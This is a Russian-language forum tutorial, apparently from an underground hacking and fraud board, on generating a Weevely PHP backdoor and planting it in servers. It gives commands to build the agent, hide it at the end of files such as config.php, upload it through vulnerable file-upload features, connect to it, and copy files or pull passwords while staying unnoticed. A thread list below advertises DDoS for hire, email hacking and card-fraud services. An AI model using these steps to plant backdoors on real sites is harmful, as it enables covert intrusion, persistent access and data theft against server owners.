Вставка бэкдора на PHP вебсайтах с Weevely

Forevonly

Original poster
Pro Member
Сообщения
599
Реакции
601
Посетить сайт
Очень удобно оставлять после себя бэкдоры, если вы однажды уже смогли найти путь на сервер, и они смогут пригодиться в большом количестве случаев. Они хороши для разработчиков, которые хотят иметь быстрый доступ к машинам, на которых они работают, или для системных администраторов, которым нужен такой же доступ. Также, безусловно, бэкдоры являются лучшими друзьями хакеров и могут быть добавлены множеством способов. Одним хорошим инструментом для этого является Weevely, который использует отрезок PHP кода.

Weevely создает терминал на целевой машине и позволяет действовать удаленному коду через небольшой след PHP агента. Он включает в себя более 30 модулей для административных и технических нужд, а также разрешение расширения и даже сетевое радиальное смещение. Подумайте о тех аккаунтах, что вы используете, которые блокируют ваш доступ – здесь это может пригодиться, также как и на других серверах, на которые вам удалось просочиться.

В данном руководстве, мы будем брать это за основу на нашем локальном хосте. Вы можете следовать этому, или запустить его на другом сервере, где вы сможете сделать с ним намного больше.



Step 1 Скачиваем Weevely
Weevely может быть встроен в некоторые версии Linux, например, Kali. Если он не установлен на вашей системе Linux, вы можете найти 3 версию на

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

. Чтобы установить его на стандартный Linux distro, есть множество способов сделать это, включая

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

, HTTP, и wget.

Код:
wget https://github.com/epinna/weevely3/archive/master.zip

Step 2 Создание фрагмента PHP
Не имеет значение, как вы установили Weevely, убедитесь, что у вас есть терминал или окно оболочки, открытое в директории содержащей файл master.zip. Предположим, что вы скачали его в папку Downloads, перейдем в нее, распакуем файлы, перейдите в папку с распакованными файлами и просмотрите ее содержимое.

Код:
cd Downloads
unzip master.zip
cd weevely3-master/
ls
Вам нужно запустить установочный файл weevely.py отдельно для того, чтобы понять то, о чем мы говорим здесь, потому что скрипт требует особого синтаксиса, и вы можете узнать о нем здесь.
Код:
./weevely.py



В нашем примере, мы будем использовать опцию "Generate backdoor agent". Пусть наш пароль будет следующим pazzWurD, и назовем путь нашего PHP файла backdoor.php. Мы должны получить файл под названием backdoor.php в той же директории, где мы работаем.

Обратите внимание, что backdoor.php не является хорошим именем для вашего PHP файла. Это всего лишь пример. Вы не хотите привлекать много внимания к тому, что вы делаете, поэтому убедитесь, что вы заменили название файлов "mypassword" и "myfilename.php" на что-то менее очевидное.

Код:
./weevely.py generate mypassword myfilename.php


Step 3 Вставка вашего Backdoor
Теперь, вооружившись новым PHP скриптом (в нашем случае это backdoor.php), мы можем рассмотреть несколько способов его применения. Сначала, если у вас есть доступ к серверу вы можете просто скопировать/вставить содержимое вашего PHP файла в другой доступный PHP файл на сервере. Например, в config.php или settings.php файлы, которые вы можете там найти. Сначала, я скопирую содержимое моего backdoor.php скрипта в текстовом редакторе.


Затем, я вставлю целый блок кода PHP внизу всего остального PHP кода в файле запущенном на моем сервере. Здесь, я вставляю его внизу всего в файле info.php на моем сервере. Мне пришлось использовать Vi редактор на моем сервере.


Мой info.php продолжает работать в обычном режиме, но скрипт, указанный ниже, продолжает оставаться неизменным до обращения к нему

Другая вещь, которую вам следует попробовать, это найти уязвимый сайт с возможностью загрузки на него информации – свойство, которое позволяет вам делиться файлами или изображениями. Сделайте это, получить ссылку на ваш файл и вы в деле.


Большинство сайтов, как этот, будет блокировать загрузку скриптов, но не каждый сайт является совершенным.

Как бы вы это ни сделали, вы хотите поместить ваш backdoor.php файл — или содержимое вашего PHP файла — в другой PHP файл, на каком-то локальном или удаленном сервере.



Step 4 Доступ к вашему бэкдору
Первое, что вы можете заметить в Weevely это то, что ваш backdoor.php файл, запущенный в веб-директории или в конце другого PHP файла, ничего не делает и не показывает в вашем браузере. И это хорошо! Если бы ваш файл отображался на сайте, он был бы сразу замечен и подправлен, или даже использован кем-либо еще, а нам этого совсем не нужно.


Что нам нужно, так это снова открыть файл weevely.py на нашей системе, только в этот раз мы не будем создавать файл с ним – мы используем его, чтобы указать место, куда мы посетим созданный ранее скрипт. На моем локальном хосте с моими файлами, это выглядит так:

Код:
./weevely.py http://localhost/info.php pazzWurD
Если Вы не тестируете это с локального хоста, это выглядит чем-то подобным:
Код:
./weevely.py http://some.websitename.com/myfilename.php mypassword

Так или иначе, используйте Weevely, чтобы вызвать ваш файл, и вы увидите следующий ответ:


Просто напечатайте: help, и это покажет вам все, что вы можете делать из этой позиции.

В Weevely встроены дополнительные 30 модулей, так что существует множество моментов для работы. Например, file_ls делает точно то, что вы подумали, а file_cp может позволить вам скопировать файл, как только вы разработаете пути от и до, как на локальной системе. Вы сможете получить все сразу при помощи file_tar, затем используйте cp, чтобы получить много материалов для чтения.

Есть несколько путей увеличить ваши права в Weevely, так что если у вас есть расширенные права на сервере, вы можете делать практически все с ним. Вы сможете получить несколько ключей на вашей целевой системе с audit_password. Не забывайте оставаться внизу здесь, чтобы сохранить ваше время и силы, если вы не можете разобраться с вашей собственной системой, и чтобы остаться незамеченным в чужой системе.

Устранение проблем
Возникали ли у вас ошибки во время выполнения этих упражнений? Я работал на новой системе, так что пока я распаковывал директорию master.zip, и смотрел файлы, которые она содержит, я не мог получить Weevely's Python скрипт, для корректного запуска. Если у вас подобная ситуация и вы видите следующее:

Код:
ImportError: No module named prettytable
Сделайте что-то вроде следующего, замещая имя модуля, того чего не хватает:

Код:
$ sudo apt install python-prettytable
 
Название темы
Автор Заголовок Раздел Ответы Дата
Admin Способы загрузки шелла/бэкдора на сайт Уязвимости и взлом 0
A Интересно Пишем свой RAT на Python > {Часть 2} Уязвимости и взлом 2
MoneyLoad Принимаю заливы на пластик любого направления Ищу работу. Предлагаю свои услуги. 1
balof Seed4.Me VPN - на неограниченный срок Полезные статьи 0
S Интересно нужен вбив на вебкам Предоставляю работу. Ищу специалиста. 1
rdp.onedash Скоростные VPS сервера на Windows — OneDash RDP Сайты/Хостинг/Сервера 1
A Пишем свой RAT на Python > {Часть 1} Уязвимости и взлом 0
mousegreen Быстрый заработок за верификацию на сайте Предоставляю работу. Ищу специалиста. 2
Zer0D4y Заработок на озабоченных Способы заработка 1
Y возьму на обучению вбиву в амазон и ебей Предоставляю работу. Ищу специалиста. 0
Kalash [Розыгрыш] Розыгрыш 1000 рублей на киви!!! Розыгрыши 0
S Простой способ получить реальные $30 на торговлю Предоставляю работу. Ищу специалиста. 0
bu8ba Собственное казино и зарабатываем на нем Способы заработка 1
M Блэк на #~Shinigami~# Black list и Разборки 1
V Схема заработка на SMM партнерках Способы заработка 1
G залью на сша, белоруссию Предоставляю работу. Ищу специалиста. 1
brigabos Как экономить на Яндекс.Директ, Google Ads и соц. сетях. Кешбеки и купоны. Другое 0
Janipai Схема заработка от 5$ в день на своем аккаунте инстаграм Способы заработка 5
X Есть тут кто с репой на ире? Свободное общение и флейм 2
U Нужны люди со всего мира на верифы Предоставляю работу. Ищу специалиста. 2
E Как сменить устройство на Tide? Вопросы и интересы 0
zladey1986 Продам Скрипт прием платежей p2p, card 2 card (с карты на карту) Все что не подошло по разделу 1
brigabos Простая схема как получить 133$ на рекламу в Google Ads (Adwords) Другое 0
S ✅ Промокоды на продвижение в Instagram, до 60% кешбек. Спам, рассылки, трафик, SEO 0
S ✅ АдминВПС. Промокод на скидку 60% - хостинг и VPS. Сайты/Хостинг/Сервера 1
I Ross CLOUD - Лучшее и самое БОЛЬШОЕ ОБЛАКО ЛОГОВ на рынке Ищу работу. Предлагаю свои услуги. 0
I Ross CLOUD - Лучшее и самое БОЛЬШОЕ ОБЛАКО ЛОГОВ на рынке Финансы - биллинги, банки, кошельки, логи 0
adflak Полный спектр услуг: Постинг на форумах \ Ссылки в подписях \ Разоблачение мошенников \ И многое другое! Ищу работу. Предлагаю свои услуги. 6
L Приглашаются дроповоды по ЕС на стабильную работу с высокой оплатой. Предоставляю работу. Ищу специалиста. 2
superman_ddos Service DDOS Attack/ДДОС Атака на заказ. Профессионалы к вашим услугам. Спам / Флуд / Ддос 2
U Интересно Нужны люди из Грузии, Украины и Снг на верифы Предоставляю работу. Ищу специалиста. 0
xoWells Схема на миллион. Забираем свои BTC у жертвы :) Обучения, схемы, мануалы 1
B Bitmoneyekb.com - Обмен криптовалюты на наличные МСК/ЕКБ Обменники 0
Khan Хакер из Бобруйска заработал полмиллиона долларов на брутфорс-атаках Новости в сети 0
B Заливы на карты Предоставляю работу. Ищу специалиста. 0
D Оптовый взлом почты на заказ (цена 20$) Взлом почты Mail.ru Yandex.ru Rambler.ru Ищу работу. Предлагаю свои услуги. 0
Ricardo Milos Продам Сим-карты на физ лиц | МТС | Мегафон | Билайн | Tele2 | Yota | Ростелеком | AIVA Финансы - биллинги, банки, кошельки, логи 0
H Заработок на арбитраже трафика в своем сообществе Вконтакте в 2021м году Способы заработка 0
H 1000$ на продаже сообществ (2021) Способы заработка 1
H Первые деньги на Авито без вложений (2021) Способы заработка 1
H 5000 р в день на трафике (2021) Способы заработка 0
K HASH Bhf.io Дамп на 19gb Раздача email 2
Р Интересно 1000 рублей на Delivery Club HONOR 10X Lite или HUAWEI P smart Способы заработка 0
NickelBlack MIX 587k на btc Раздача email 1
K Актуализируем / прочекаем Ваши телефонные базы на валид Пробив информации/Прозвоны 1
SamBonus ❗️Фотодропы. Фото шаблоны для отрисовки. Идеальное качество, любые комплекты на заказ. Ищу работу. Предлагаю свои услуги. 3
AnanasOfficial Реклама на теневых форумах. Ищу работу. Предлагаю свои услуги. 0
Р Интересно 100 руб на мобильник(нужны сканы) Другое 0
Z Продам лью на германию Финансы - биллинги, банки, кошельки, логи 1
zheka424 Заработок на партнерке банков от 2 000 руб Способы заработка 1

Название темы